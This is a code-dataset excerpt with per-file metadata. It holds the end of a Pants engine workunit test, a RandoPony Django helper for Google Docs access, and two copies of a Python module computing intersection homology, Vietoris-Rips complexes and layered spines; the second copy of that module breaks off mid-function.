            argv=("/bin/bash", "-c", "1>&2 /bin/echo 'stderr output'"), description="Stderr process"
        )
        with handler.session():
            result = self.request_single_product(ProcessResult, stderr_process)
        assert tracker.finished
        finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
        process_workunit = next(
            item for item in finished if item["name"] == "multi_platform_process-running"
        )
        assert process_workunit is not None
        stdout_digest = process_workunit["artifacts"]["stdout_digest"]
        stderr_digest = process_workunit["artifacts"]["stderr_digest"]
        assert result.stderr == b"stderr output\n"
        assert stdout_digest == EMPTY_DIGEST
        assert stderr_digest.serialized_bytes_length == len(result.stderr)
|
en
| 0.786018
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). # type: ignore[return] # This set of dummy types and the following `@rule`s are intended to test that workunits are # being generated correctly and with the correct parent-child relationships. This rule should be the first one executed by the engine, and thus have no parent. This rule should be invoked in the body of `rule_one` and therefore its workunit should be a child of `rule_one`'s workunit. This rule should be invoked in the body of `rule_one` and therefore its workunit should be a child of `rule_one`'s workunit. This rule should be invoked in the body of `rule_two` and therefore its workunit should be a child of `rule_two`'s workunit. # Tests that a rule that "uses itself" multiple times per invoke works. 2 Exceptions encountered: Exception: An exception for B Exception: An exception for B 1 Exception encountered: Traceback (most recent call last): File LOCATION-INFO, in nested_raise fn_raises(x) File LOCATION-INFO, in fn_raises raise Exception(f"An exception for {type(x).__name__}") Exception: An exception for B # Tests that when multiple distinct failures occur, they are each rendered. 
# type: ignore[return] # type: ignore[return] 1 Exception encountered: Computing Select(<{__name__}..B object at 0xEEEEEEEEE>, A) Computing Task(a_from_c_and_d(), <{__name__}..B object at 0xEEEEEEEEE>, A, true) Computing Task(d_from_b_nested_raise(), <{__name__}..B object at 0xEEEEEEEEE>, =D, true) Throw(An exception for B) Traceback (most recent call last): File LOCATION-INFO, in call val = func(*args) File LOCATION-INFO, in d_from_b_nested_raise fn_raises(b) File LOCATION-INFO, in fn_raises raise Exception('An exception for {{}}'.format(type(x).__name__)) Exception: An exception for B Computing Select(<{__name__}..B object at 0xEEEEEEEEE>, A) Computing Task(a_from_c_and_d(), <{__name__}..B object at 0xEEEEEEEEE>, A, true) Computing Task(c_from_b_nested_raise(), <{__name__}..B object at 0xEEEEEEEEE>, =C, true) Throw(An exception for B) Traceback (most recent call last): File LOCATION-INFO, in call val = func(*args) File LOCATION-INFO, in c_from_b_nested_raise fn_raises(b) File LOCATION-INFO, in fn_raises raise Exception('An exception for {{}}'.format(type(x).__name__)) Exception: An exception for B # No rules are available to compute A. Rules with errors: 1 {fmt_rule(upcast)}: No rule was available to compute MyInt. Maybe declare RootRule(MyInt)? This class records every non-empty batch of started and completed workunits received from the engine. # The execution of the single named @rule "fib" should be providing this one workunit. # Requesting a bigger fibonacci number will result in more rule executions and thus more reported workunits. # In this case, we expect 10 invocations of the `fib` rule. # rule_one should complete well-after the other rules because of the artificial delay in it caused by the sleep(). # Because of the artificial delay in rule_one, it should have time to be reported as # started but not yet finished. 
# rule_one should have no parent_id because its actual parent workunit was filted based on level # With the max_workunit_verbosity set to TRACE, we should see the workunit corresponding to the Select node. # need to call this so that self._scheduler is not None when we pass it to StreamingWorkunitHandler
| 1.893702
| 2
|
pasture/helpers.py
|
douglatornell/randopony
| 0
|
6628076
|
<gh_stars>0
"""Helper functions for the RandoPony apps.
"""
# Google Docs:
import gdata.acl.data
# Django:
from django.conf import settings
#RandoPony:
from .models import EmailAddress
def email2words(email):
    """Obfuscate an email address for display.

    '@' becomes ' at ' and every '.' becomes ' dot ', which keeps the
    address human-readable while hindering naive address scrapers.
    """
    words = email
    for literal, spoken in (('@', ' at '), ('.', ' dot ')):
        words = words.replace(literal, spoken)
    return words
def google_docs_login(service):
    """Log in to a Google Docs service and return the authenticated client.

    *service* is a gdata client class. The account name comes from the
    EmailAddress row keyed 'google_docs'; the password from Django
    settings. The third ClientLogin argument is the application source
    string (a redacted placeholder in this copy of the file).
    """
    client = service()
    client.ssl = True  # force HTTPS for the login exchange
    username = EmailAddress.objects.get(key='google_docs').email
    client.ClientLogin(username, settings.GOOGLE_DOCS_PASSWORD, '<PASSWORD>opony')
    return client
def get_rider_list_template(template_name, client):
    """Return the Google Docs resource whose title equals template_name.

    Iterates the documents visible to *client* and returns the first one
    whose title text matches. Returns None when no document matches — the
    original raised an accidental NameError (`template` unbound) in that
    case.
    """
    docs = client.get_resources()
    template = None
    for doc in docs.entry:
        if doc.title.text == template_name:
            template = doc
            break
    return template
def share_rider_list_publicly(doc, client):
    """Grant public read access to a Google Docs resource.

    Posts an ACL entry with scope 'default' (anyone) and role 'reader' to
    the document's ACL feed, making *doc* world-readable.
    """
    scope = gdata.acl.data.AclScope(type='default')
    role = gdata.acl.data.AclRole(value='reader')
    acl_entry = gdata.acl.data.AclEntry(scope=scope, role=role)
    client.Post(acl_entry, doc.get_acl_feed_link().href)
|
"""Helper functions for the RandoPony apps.
"""
# Google Docs:
import gdata.acl.data
# Django:
from django.conf import settings
#RandoPony:
from .models import EmailAddress
def email2words(email):
"""Return a slightly obfuscated version of the email address.
Replaces @ with ' at ', and . with ' dot '.
"""
return email.replace('@', ' at ').replace('.', ' dot ')
def google_docs_login(service):
client = service()
client.ssl = True
username = EmailAddress.objects.get(key='google_docs').email
client.ClientLogin(username, settings.GOOGLE_DOCS_PASSWORD, '<PASSWORD>opony')
return client
def get_rider_list_template(template_name, client):
docs = client.get_resources()
for doc in docs.entry:
if doc.title.text == template_name:
template = doc
break
return template
def share_rider_list_publicly(doc, client):
scope = gdata.acl.data.AclScope(type='default')
role = gdata.acl.data.AclRole(value='reader')
acl_entry = gdata.acl.data.AclEntry(scope=scope, role=role)
client.Post(acl_entry, doc.get_acl_feed_link().href)
|
en
| 0.817961
|
Helper functions for the RandoPony apps. # Google Docs: # Django: #RandoPony: Return a slightly obfuscated version of the email address. Replaces @ with ' at ', and . with ' dot '.
| 2.333667
| 2
|
ihspines.py
|
BanaglMaeder/layered-spines
| 0
|
6628077
|
<reponame>BanaglMaeder/layered-spines<gh_stars>0
import numpy as np
import copy
# Floor functions is used for certain perversity functions
from math import floor
from numpy.linalg import norm
# Delaunay triangulation used to generate Delaunay-Vietoris-Rips complexes
from scipy.spatial import Delaunay
###############################################################################
###########################Z/2Z SMITH NORMAL FORM##############################
###############################################################################
def AddRows(M, i, j):
    """Return a copy of M with row i replaced by (row i + row j) mod 2."""
    result = copy.deepcopy(M)
    summed = M[i] + M[j]
    result[i] = summed % 2
    return result
def ExchangeRows(M, i, j):
    """Return a copy of M with rows i and j swapped."""
    swapped = copy.deepcopy(M)
    swapped[[i, j]] = M[[j, i]]
    return swapped
def ExchangeCols(M, i, j):
    """Return a copy of M with columns i and j swapped."""
    swapped = copy.deepcopy(M)
    swapped[:, [i, j]] = swapped[:, [j, i]]
    return swapped
def AddCols(M, i, j):
    """Return a copy of M with column i replaced by (col i + col j) mod 2."""
    result = copy.deepcopy(M)
    result[:, i] = (M[:, i] + M[:, j]) % 2
    return result
def SNF(M, i=0):
    """Reduce the binary matrix M to Smith normal form over Z/2Z.

    Recursively places a pivot 1 at position (i, i), clears the rest of
    column i and row i with row/column additions mod 2, and recurses on
    the trailing submatrix. The row/column helpers return fresh copies,
    so the caller's matrix is left untouched.
    """
    m, n = M.shape
    # Indices (relative to the trailing submatrix) of all remaining 1s.
    IndOnes = np.where(M[i:, i:] == 1)
    if IndOnes[0].size:
        # First remaining 1, shifted back to absolute coordinates.
        j,k = IndOnes[0][0]+i, IndOnes[1][0]+i
        if (j,k) != (i,i):
            M = ExchangeRows(M, i, j)
            M = ExchangeCols(M, i, k)
        # Eliminate the 1s below the pivot ...
        for l in range(i+1, m):
            if M[l,i] == 1:
                M = AddRows(M, l, i)
        # ... and to the right of the pivot.
        for h in range(i+1, n):
            if M[i,h] == 1:
                M = AddCols(M, h, i)
        M = SNF(M, i+1)
    return M
###############################################################################
########################SIMPLICIAL OPERATIONS##################################
###############################################################################
#Computing the dimension of a simpl. cplx.
def ComplexDimension(C):
    """Return the top dimension of simplicial complex C.

    C is a list of simplex lists indexed by dimension; the dimension is
    the largest index holding at least one simplex. -100 is the sentinel
    for an empty complex.
    """
    if not C:
        return -100
    for dim in reversed(range(len(C))):
        if C[dim]:
            return dim
    return -100
# SimplexIntersections returns the "largest" face of given simpl. s and t
def SimplexIntersection(s, t):
    """Return the sorted common vertices of simplices s and t."""
    common = np.intersect1d(sorted(s), sorted(t))
    return list(common)
# function tests whether a simplex is contained in a simpl. cplx or not
def inArray(arr, list_of_arr):
    """Return True when arr occurs in list_of_arr up to vertex order."""
    target = sorted(arr)
    return any(np.array_equal(target, sorted(candidate)) for candidate in list_of_arr)
# ComplexIntersection returns a list of simplices (not a complex but in a
# similar format) of the simplices in the simpl. cplx. K that are faces of the
# simplex s. The special format of the output allows us to apply the function
# ComplexDimension to it.
def ComplexIntersection(s,K):
    """Collect the faces of simplex s that belong to complex K.

    Returns sorted([s]) when s itself is a simplex of K; otherwise a
    dimension-indexed list of lists (the same layout ComplexDimension
    expects) holding every face of s found in K, without duplicates.
    """
    k = len(s)-1
    n = ComplexDimension(K)
    if(k <= n):
        if inArray(sorted(s),K[k]):
            return sorted([s])
    inter = []
    for i in range(0,min(k+1,n+1)):
        inter = inter + [[]]
        for t in K[i]:
            u = np.intersect1d(sorted(s),sorted(t)).tolist()
            # Keep t only when it is a full i-simplex contained in s and
            # has not been recorded already.
            if (len(u) and not(inArray(sorted(u),inter[i])) and len(u)-1 == i):
                inter[i].append(u)
    return inter
###############################################################################
##########################INTERSECTION CHAIN COMPLEX###########################
###############################################################################
# Some common perversity functions
def TopP(k):
    """Top perversity: t(k) = k - 2 for k >= 2, else 0."""
    return k - 2 if k >= 2 else 0
def ZeroP(k):
    """Zero perversity: identically 0."""
    return 0
def LowMidP(k):
    """Lower-middle perversity: floor((k - 2) / 2) for k >= 2, else 0."""
    return floor((k - 2) / 2) if k >= 2 else 0
def UpMidP(k):
    """Upper-middle perversity: floor((k - 1) / 2) for k >= 2, else 0."""
    return floor((k - 1) / 2) if k >= 2 else 0
def minus(k):
    """Constant perversity -1."""
    return -1
# isProper decides whether or not a given simplex s is proper in the sense of
# corresponding to a simplicial chain that is transverse +- perversity
# Note: we allow a simplex to be proper even if it's boundary is not. The
# output is later on used to determine intersection chains.
def isProper(s, strata, p):
    """Test whether simplex s is proper for the stratification and perversity.

    p may be a perversity function or one of the shorthand strings
    "0", "t", "m", "n", "-1". s is proper when, for every singular
    stratum i, dim(s ∩ strata[i]) <= dim(s) - codim(i) + p(codim(i)).
    """
    # Map string shorthands onto the perversity functions defined above.
    if (p == "0"):
        p = ZeroP
    if (p == "t"):
        p = TopP
    if (p == "m"):
        p = LowMidP
    if (p == "n"):
        p = UpMidP
    if (p == "-1"):
        p = minus
    j = len(s)-1
    n = ComplexDimension(strata[0])
    for i in range(1,len(strata)):
        # k is the codimension of stratum i inside the whole complex.
        k = n - ComplexDimension(strata[i])
        dimIntersection = ComplexDimension(ComplexIntersection(s,strata[i]))
        if (dimIntersection > (j - k + p(k))):
            return False
    return True
# IS takes a simpl. cplx. C with specified stratification strata and a
# perversity p. It returns the simplices in C that are proper (in the above
# sense) and the ones that are not proper in two separate lists.
def IS(C,strata,p):
    """Split the simplices of C into proper and improper ones.

    Returns (CP, CIP): CP[i] holds the i-simplices that are proper with
    respect to strata and perversity p, CIP[i] the remaining ones.
    """
    CP = []
    CIP = []
    for i in range(len(C)):
        CP.append([])
        CIP.append([])
        for x in C[i]:
            if isProper(x,strata,p):
                CP[i].append(x)
            else:
                CIP[i].append(x)
    return CP,CIP
# In the following we define some functions to perform a matrix reduction
# algorithm. This will be used to identify all simplicial intersection
# chains, also the non elementary ones.
def low(M, j):
    """Return the largest row index of a minimal nonzero entry in column j.

    For the binary matrices used here this is the bottom-most 1 of the
    column; a column that is entirely zero yields -1.
    """
    column = M[:, j]
    nonzero_rows = np.nonzero(column)[0]
    if nonzero_rows.size == 0:
        return -1
    smallest = column[nonzero_rows].min()
    return np.where(column == smallest)[0].max()
# The input for the function MatrixReduction is a matrix M and an integer k.
# This routine executes elementary column transformations from left to right
# in order to eliminate nonzero entries below the row index k.
# The output includes the matrix M in reduced form and a lists columns whose
# entries below index k are all zero. This process works in Z/2Z only.
def MatrixReduction(M,k):
    """Column-reduce the binary matrix M below row index k (Z/2Z only).

    Repeatedly adds earlier columns into later ones until no two columns
    share the same lowest 1 below row k. NOTE(review): M is modified in
    place — pass a copy if the caller still needs the original. Returns
    the reduced matrix and ProperComb, the lists of original column
    indices whose sums produced each column that is now zero below row k.
    """
    comb = []
    # comb[j] records which original columns have been folded into column j.
    for t in range(0,M.shape[1]):
        comb.append([t])
    ProperComb = []
    stop = False
    while not stop:
        count = 0
        for j in range(M.shape[1]-1,-1,-1):
            if low(M,j) > k:
                for i in range(j-1,-1,-1):
                    if low(M,i) == low(M,j) and low(M,j) > k:
                        M[:,j] = M[:,j]+M[:,i]
                        comb[j]= comb[j] + comb[i]
                        count = count+1
        # Reduce mod 2 once per sweep; entries may temporarily hold 2s
        # within a sweep.
        M = M%2
        if count == 0:
            stop = True
    for j in range(0,M.shape[1]):
        if low(M,j) <= k:
            ProperComb.append(comb[j])
    return M, ProperComb
# The function IC accepts a simpl. cplx. C, a stratification strata
# and a perversity p. The output includes the perversity p Intersection
# Chain Complex associated with the initial complex C. The filtration is
# specified by strata. Furthermore, IC also returns the Betti numbers of
# perversity p intersection homology.
def IC(C,strata,p):
    """Compute the perversity-p intersection chain complex and Betti numbers.

    C is a dimension-indexed simplicial complex, strata its filtration
    (strata[0] is the whole complex), and p a perversity function or one
    of the string shorthands accepted by isProper. Returns (ICC, Betti),
    where ICC[i] lists the allowable i-chains (each a list of simplices)
    and Betti holds the Z/2Z intersection homology Betti numbers.
    """
    CP, CIP = IS(C,strata,p)
    n = len(CP)-1
    ranks = [0]
    # list for the resulting Intersection Chain Complex
    ICC = []
    for i in range(0,len(CP)):
        ICC.append([])
    # Every proper vertex is an allowable 0-chain.
    for v in CP[0]:
        ICC[0].append([v])
    for i in range(n,0,-1):
        ns1 = len(CP[i])
        # Note: If there are no improper simplices in this dimension there is
        # nothing to do
        numImprop = len(CIP[i-1])
        aC = CP[i-1] + CIP[i-1]
        # Setting up the binary incidence matrix following the order in aC.
        M = np.zeros((len(C[i-1]), ns1), dtype=int)
        for j in range (0, ns1):
            s = CP[i][j]
            facets = []
            for k in range (0, i+1):
                f = s.copy()
                del f[k]
                facets = facets + [f]
            for k in range (0, len(C[i-1])):
                if aC[k] in facets:
                    M[k,j] = 1
        redM = MatrixReduction(M,len(C[i-1])-1-numImprop)
        # We determine the intersection chain complex with redM[1].
        # The list redM[1] contains indices corresponding to the proper
        # i-simplices that make as sum an allowable simpl. chain
        for l in redM[1]:
            c = []
            for ind in l:
                c.append(CP[i][ind])
            ICC[i].append(c)
        # Next, we calculate the Betti numbers via the rank of a reduced matrix
        B = redM[0]
        A = np.zeros((len(C[i-1]), ns1), dtype=int)
        for j in range(0,B.shape[1]):
            if low(B,j) <= len(C[i-1])-1-numImprop:
                A[:,j] = B[:,j]
        shapeA = np.shape(A)
        if shapeA[0] == 0 or shapeA[1] == 0:
            R = 0
        else:
            A_snf = SNF(A)
            R = 0
            # Rank over Z/2Z = number of 1s on the SNF diagonal.
            # NOTE(review): this inner loop reuses the outer loop variable
            # i; the outer loop still advances correctly because range()
            # re-assigns i on the next iteration, but the reuse is fragile
            # — confirm before refactoring.
            for i in range(0,min(shapeA[0],shapeA[1])):
                if A_snf[i,i] == 1:
                    R = R+1
        ranks.append(R)
    ranks.append(0)
    ranks = ranks[::-1]
    BettiNumbers = []
    n = len(ICC)
    for i in range(n):
        # Betti_i = #chains_i - rank(d_i) - rank(d_{i+1})
        Betti = len(ICC[i])-ranks[i]-ranks[i+1]
        BettiNumbers.append(Betti)
    return ICC, BettiNumbers
# Auxiliary function to check whether or not a given simpl. cplx. represents a
# pseudomanifold
def isPseudomanifold(C):
    """Check the pseudomanifold conditions for complex C.

    Requires every simplex to be a face of some top-dimensional simplex,
    and every (n-1)-simplex to be a face of exactly two n-simplices.
    Returns True on success, False when some simplex has no
    top-dimensional coface, and [False, countlist] when a codimension-1
    incidence count differs from two (note the mixed return types).
    """
    n = ComplexDimension(C)
    countlist = []
    for i in range(0,n):
        for s in C[i]:
            count = 0
            for t in C[n]:
                # s is a face of t when all of its vertices lie in t.
                if len(SimplexIntersection(s,t))==len(s):
                    count = count +1
            if count == 0:
                return False
            if i == n-1:
                countlist.append(count)
                if count != 2:
                    return [False,countlist]
    return True
###############################################################################
###################SIMPLICIAL COMPLEXES FROM POINT CLOUDS######################
###############################################################################
# DelVR complex, compare do DelCech complex as in Bauer & Edelsbrunner 2017.
# Currently restricted to point clouds xyz of dimension <= 3.
# We employed the function Delaunay from the scipy.spatial package to realize
# Delaunay triangulations.
def DelaunayComplex(xyz,r):
    """Delaunay-Vietoris-Rips complex of point cloud xyz at scale r.

    Builds the Delaunay triangulation of xyz (points of dimension 2 or 3)
    and keeps each Delaunay simplex whose vertex set has pairwise
    distances at most 2*r. Returns [vertices, edges, triangles,
    tetrahedra]; for planar input the tetrahedra list stays empty.
    """
    dim=len(xyz[0])
    edges = []
    triangles = []
    tetrahedra = []
    lengthpc = len(xyz)
    vertices = [[i] for i in range(0,lengthpc)]
    pcnp = np.array(xyz)
    delaunay = Delaunay(xyz).simplices
    # First we construct Delaunay triangulation and then select simplices
    # whose vertices lie pairwise closer than distance r to each other.
    if dim==2:
        DelE = []
        DelTr = delaunay
        for i in range(0, len(DelTr)):
            triple = DelTr[i]
            triple.sort()
            DelE.append(list([triple[0], triple[1]]))
            DelE.append(list([triple[0], triple[2]]))
            DelE.append(list([triple[1], triple[2]]))
        # DelE may contain duplicate simplices. So we need to remove these
        # duplicates:
        auxtup = [tuple(s) for s in DelE]
        auxset = set(auxtup)
        auxlist = list(auxset)
        DelE = [list(t) for t in auxlist]
    if dim==3:
        DelE = []
        DelTr = []
        DelTe = delaunay
        for i in range(0, len(DelTe)):
            quad = DelTe[i]
            quad.sort()
            DelTr.append(list([quad[0], quad[1], quad[2]]))
            DelTr.append(list([quad[0], quad[1], quad[3]]))
            DelTr.append(list([quad[0], quad[2], quad[3]]))
            DelTr.append(list([quad[1], quad[2], quad[3]]))
        auxtup = [tuple(s) for s in DelTr]
        auxset = set(auxtup)
        auxlist = list(auxset)
        DelTr = [list(t) for t in auxlist]
        for i in range(0, len(DelTr)):
            triple = DelTr[i]
            DelE.append(list([triple[0], triple[1]]))
            DelE.append(list([triple[0], triple[2]]))
            DelE.append(list([triple[1], triple[2]]))
        auxtup = [tuple(s) for s in DelE]
        auxset = set(auxtup)
        auxlist = list(auxset)
        DelE = [list(t) for t in auxlist]
    # Keep only the simplices whose vertex sets have diameter <= 2*r.
    for e in DelE:
        i = e[0]
        j = e[1]
        distance = norm(pcnp[i] - pcnp[j])
        if(r >= distance/2):
            edges.append([i, j])
    for tri in DelTr:
        i = tri[0]
        j = tri[1]
        k = tri[2]
        M = max(norm(pcnp[j]-pcnp[k]),
                norm(pcnp[i]-pcnp[j]),
                norm(pcnp[i]-pcnp[k]))
        if(r >= M/2):
            triangles.append([i, j, k])
    if dim == 3:
        for tet in DelTe:
            i = tet[0]
            j = tet[1]
            k = tet[2]
            l = tet[3]
            M = max(norm(pcnp[i]-pcnp[j]),
                    norm(pcnp[i]-pcnp[k]),
                    norm(pcnp[i]-pcnp[l]),
                    norm(pcnp[j]-pcnp[k]),
                    norm(pcnp[j]-pcnp[l]),
                    norm(pcnp[k]-pcnp[l]))
            if(r >= M/2):
                tetrahedra.append([i, j, k,l])
    return [vertices,edges,triangles,tetrahedra]
# The function VRComplex calculates the Vietoris-Rips complex of a
# point cloud xyz for the radius r. Currently the complex is restricted
# to dimension 3.
def VRComplex(xyz,r):
    """Vietoris-Rips complex of point cloud xyz at scale r, up to dimension 3.

    A simplex enters the complex when all pairwise distances between its
    vertices are strictly below 2*r. Returns [VR0S, VR1S, VR2S, VR3S],
    the simplex lists by dimension.
    """
    lengthpc = len(xyz)
    pcnp = [np.array(x) for x in xyz]
    VR0S = [[i] for i in range (0, lengthpc)]
    Diameter = 2*r
    VR1S = []
    for i in range(0, lengthpc):
        for j in range (i+1, lengthpc):
            if norm(pcnp[i] - pcnp[j]) < Diameter:
                VR1S = VR1S + [[i,j]]
    VR2S = []
    # Each 2-simplex arises by extending an edge with a third close vertex.
    for s1 in VR1S:
        for i in range (0, lengthpc):
            j = s1[0]
            k = s1[1]
            if i != j and i != k:
                x = pcnp[j]
                y = pcnp[k]
                nx = norm(pcnp[i] - x)
                ny = norm(pcnp[i] - y)
                if nx < Diameter and ny < Diameter:
                    # Build a 2-simplex s2 with vertices i,j,k:
                    s2 = [i,j,k]
                    # s2 need not be an >oriented< 2-simplex; we first
                    # need to sort the vertices in ascending order:
                    s2.sort()
                    # add the oriented 2-simplex s2 to the
                    # Vietoris-Rips complex:
                    VR2S = VR2S + [s2]
    # VR2S may contain duplicate simplices. So we need to remove these
    # duplicates:
    auxtup = [tuple(s) for s in VR2S]
    auxset = set(auxtup)
    auxlist = list(auxset)
    VR2S = [list(t) for t in auxlist]
    VR3S = []
    # We compute the 3-simplices of the Vietoris-Rips complex.
    # This operation is quadratic in the number of data points/2-simplices.
    # s2 ranges over all 2-simplices:
    for s2 in VR2S:
        for i in range (0, lengthpc):
            j = s2[0]
            k = s2[1]
            l = s2[2]
            if i != j and i != k and i != l:
                x = pcnp[j]
                y = pcnp[k]
                z = pcnp[l]
                nx = norm(pcnp[i] - x)
                ny = norm(pcnp[i] - y)
                nz = norm(pcnp[i] - z)
                if nx < Diameter and ny < Diameter and nz < Diameter:
                    # Build a 3-simplex s3 with vertices i,j,k,l:
                    s3 = [i,j,k,l]
                    # s3 need not be an >oriented< 3-simplex; we first
                    # need to sort the vertices in ascending order:
                    s3.sort()
                    # add the oriented 3-simplex s3 to the
                    # Vietoris-Rips complex:
                    VR3S = VR3S + [s3]
    auxtup = [tuple(s) for s in VR3S]
    auxset = set(auxtup)
    auxlist = list(auxset)
    VR3S = [list(t) for t in auxlist]
    return [VR0S,VR1S,VR2S,VR3S]
###############################################################################
###############################(LAYERED) SPINES################################
###############################################################################
# Auxillary function to check if a given simplex t is principal in a simpl.
# cplx. C
def isPrincipal(C, t):
    """Return True when simplex t is principal (has no proper coface) in C.

    A k-simplex is principal when no (k+1)-simplex of C contains it;
    top-dimensional simplices are principal by definition.
    """
    k = len(t) - 1
    if k == ComplexDimension(C):
        return True
    for s in C[k + 1]:
        # t is a face of s exactly when every vertex of t lies in s.
        # BUG FIX: the original compared the intersection *size* against
        # the list t itself (`== t`), which is always False in Python 3
        # and made every non-top simplex look principal.
        if len(SimplexIntersection(s, t)) == len(t):
            return False
    return True
# Princ will take a simpl. cplx. C and a simplex s of C.
# The output is the set of principal cofaces of s in C
def Princ(C,s):
    """Return the principal cofaces of s when s is a free face of C.

    Counts the (dim s + 1)-cofaces of s; as soon as a second coface is
    found, [] is returned (s is not free). Top-dimensional simplices also
    yield []. Otherwise the list of principal cofaces found so far is
    returned.
    """
    n = ComplexDimension(C)
    k = len(s)-1
    if(k == n):
        return []
    count = 0
    p = []
    for t in C[k+1]:
        # t is a coface of s when all of s's vertices lie in t.
        if len(SimplexIntersection(s,t))-1 == k:
            count = count+1
            if count > 1:
                return []
            if isPrincipal(C,t):
                p.append(t)
    return p
# isAdmissable is an auxiliary function to check the extra condition for an
# intermediate collapse to be elementary
def isAdmissible(s,p,S):
    """Extra condition for an intermediate collapse to be elementary.

    Examines the faces of p lying in the subcomplex S: each such face r
    must meet s in a proper, non-empty subset of s's vertices; otherwise
    collapsing the pair (s, p) is not admissible.
    """
    T = ComplexIntersection(p,S)
    for t in T:
        for r in t:
            inter = len(SimplexIntersection(r,s))
            if (inter == 0 or inter == len(s)):
                return False
    return True
# Function to realise a Collapse. Only applied if condition for an elementary
# collapse are fulfilled.
def ElemCollapse(C, s, p):
    """Perform one elementary collapse of the free pair (s, p) in C.

    p is the unique principal coface of the free face s; both are removed
    from C in place, and the mutated complex is returned.
    """
    coface_dim = len(p) - 1
    C[coface_dim].remove(p)
    C[coface_dim - 1].remove(s)
    return C
# The Function Spine computes the layered spine of a given Simpl. Cplx.(Cplx)
# with resp. to S0 and C0. If one of them is empty (this has to be specified)
# the result will be a spine of Cplx in the usual sense.
def Spine(Cplx, S0 , C0):
    """Collapse Cplx to its layered spine relative to subcomplexes S0 and C0.

    S0 and C0 steer the collapse order: S-collapses first, then
    C-collapses, then intermediate collapses (with the isAdmissible side
    condition), then a final round of C-collapses. If S0 or C0 is empty
    the result is a spine of Cplx in the usual sense. The input complex
    is not modified; a collapsed deep copy is returned.
    """
    # We create deep copies to not change the input
    # Note: This doubles the required memory
    K = copy.deepcopy(Cplx)
    n = ComplexDimension(K)
    S = copy.deepcopy(S0)
    C = copy.deepcopy(C0)
    IM = [[]]
    for i in range(1,n+1):
        # Every increment will add a list to S, C and IM to be the i-th Skeleton
        S = S + [[]]
        C = C + [[]]
        IM = IM + [[]]
        for t in K[i]:
            # Here we check if all vertices of a simplex t lie in S, C, or partly
            # in both (i.e. in IM)
            if ComplexDimension(S) >= 0:
                a = len(ComplexIntersection(t,S0)[0])
            else:
                a = -100
            if ComplexDimension(C) >= 0:
                b = len(ComplexIntersection(t,C0)[0])
            else:
                b = -100
            if a == len(t):
                S[i].append(t)
            if b == len(t):
                C[i].append(t)
            if a != len(t) and b!=len(t):
                IM[i].append(t)
    #S-Collapse
    stop = False
    # After the execution of an ElemCollapse we have to go through the
    # remaining simplices because simplices can become free after a collapse.
    while not stop:
        count = 0
        for i in range(min(ComplexDimension(K)-1,ComplexDimension(S)-1),-1,-1):
            # Creating a copy of S to iterate over
            Scopy = copy.deepcopy(S)
            for s in Scopy[i]:
                # We search the i-th skeleton for free faces
                princ_s = Princ(K,s)
                # s is free if there is exactly one princ coface and none other
                # princ_s either contains the unique principal coface of s
                # if s is free or it is an empty list
                if len(princ_s) == 1:
                    if princ_s[0] in S[i+1]:
                        K = ElemCollapse(K,s,princ_s[0])
                        S = ElemCollapse(S,s,princ_s[0])
                        count = count +1
        # If no collapse has been executed we are done and break the while-loop
        if count == 0:
            stop = True
    #C-Collapses
    stop = False
    while not stop:
        count = 0
        for i in range(min(ComplexDimension(K)-1,ComplexDimension(C)-1),-1,-1):
            Ccopy = copy.deepcopy(C)
            for c in Ccopy[i]:
                princ_c = Princ(K,c)
                if len(princ_c) == 1:
                    if princ_c[0] in C[i+1]:
                        K = ElemCollapse(K,c,princ_c[0])
                        C = ElemCollapse(C,c,princ_c[0])
                        count = count +1
        if count == 0:
            stop = True
    #Intermediate-Collapses
    stop = False
    while not stop:
        count = 0
        for j in range(min(ComplexDimension(K)-1,ComplexDimension(IM)-1),-1,-1):
            IMcopy = copy.deepcopy(IM)
            for i in IMcopy[j]:
                princ_i = Princ(K,i)
                if len(princ_i) == 1:
                    # Note: we have to check an extra condition for
                    # intermediate collapses to be elementary
                    if isAdmissible(i, princ_i[0], S):
                        K = ElemCollapse(K,i,princ_i[0])
                        IM = ElemCollapse(IM,i,princ_i[0])
                        count = count + 1
        if count == 0:
            stop = True
    #C-Collapses
    stop = False
    while not stop:
        count = 0
        for i in range(min(ComplexDimension(K)-1,ComplexDimension(C)-1),-1,-1):
            Ccopy = copy.deepcopy(C)
            for c in Ccopy[i]:
                princ_c = Princ(K,c)
                if len(princ_c) == 1:
                    if princ_c[0] in C[i+1]:
                        K = ElemCollapse(K,c,princ_c[0])
                        C = ElemCollapse(C,c,princ_c[0])
                        count = count +1
        if count == 0:
            stop = True
    return K
|
import numpy as np
import copy
# Floor functions is used for certain perversity functions
from math import floor
from numpy.linalg import norm
# Delaunay triangulation used to generate Delaunay-Vietoris-Rips complexes
from scipy.spatial import Delaunay
###############################################################################
###########################Z/2Z SMITH NORMAL FORM##############################
###############################################################################
def AddRows(M, i, j):
N = copy.deepcopy(M)
N[i] = (M[i] + M[j]) % 2
return N
def ExchangeRows(M, i, j):
N = copy.deepcopy(M)
N[[i,j]] = M[[j,i]]
return N
def ExchangeCols(M, i, j):
N = copy.deepcopy(M)
N[:, [i,j]] = N[:, [j,i]]
return N
def AddCols(M, i, j):
N = copy.deepcopy(M)
N[:, i] = (M[:, i] + M[:, j] ) % 2
return N
def SNF(M, i=0):
m, n = M.shape
IndOnes = np.where(M[i:, i:] == 1)
if IndOnes[0].size:
j,k = IndOnes[0][0]+i, IndOnes[1][0]+i
if (j,k) != (i,i):
M = ExchangeRows(M, i, j)
M = ExchangeCols(M, i, k)
for l in range(i+1, m):
if M[l,i] == 1:
M = AddRows(M, l, i)
for h in range(i+1, n):
if M[i,h] == 1:
M = AddCols(M, h, i)
M = SNF(M, i+1)
return M
###############################################################################
########################SIMPLICIAL OPERATIONS##################################
###############################################################################
#Computing the dimension of a simpl. cplx.
def ComplexDimension(C):
if not C:
return -100
for k in range(len(C)-1,-1,-1):
if len(C[k]):
return k
return -100
# SimplexIntersections returns the "largest" face of given simpl. s and t
def SimplexIntersection(s, t):
return list(np.intersect1d(sorted(s),sorted(t)))
# function tests whether a simplex is contained in a simpl. cplx or not
def inArray(arr, list_of_arr):
for elem in list_of_arr:
if np.array_equal(sorted(arr), sorted(elem)):
return True
return False
# ComplexIntersection returns a list of simplices (not a complex but in a
# similar format) of the simplices in the simpl. cplx. K that are faces of the
# simplex s. The special format of the output allows us to apply the function
# ComplexDimension to it.
def ComplexIntersection(s,K):
k = len(s)-1
n = ComplexDimension(K)
if(k <= n):
if inArray(sorted(s),K[k]):
return sorted([s])
inter = []
